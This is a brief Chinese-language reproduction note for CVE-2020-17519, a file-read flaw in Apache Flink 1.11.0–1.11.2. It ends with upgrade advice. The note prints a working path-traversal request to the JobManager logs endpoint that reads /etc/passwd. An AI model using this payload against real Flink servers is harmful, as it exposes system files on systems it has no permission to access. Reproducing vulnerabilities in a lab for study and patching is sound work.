一、漏洞概述:
CVE-2020-17519——Apache Flink 1.11.0中引入的更改(以及1.11.1和1.11.2中也发布)允许攻击者通过JobManager进程的REST接口读取JobManager本地文件系统上的任何文件。
二、影响版本:
Apache Flink : 1.11.0-1.11.2
三、环境搭建:
延用CVE-2020-17518的环境(Apache Flink 1.11.2)
四、漏洞复现:
- 抓取Job Manager的请求包
2.扔到Repeater模块,修改请求包,查看敏感信息
/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd
五、漏洞修复:
官方已发布安全版本,请及时下载升级至安全版本!
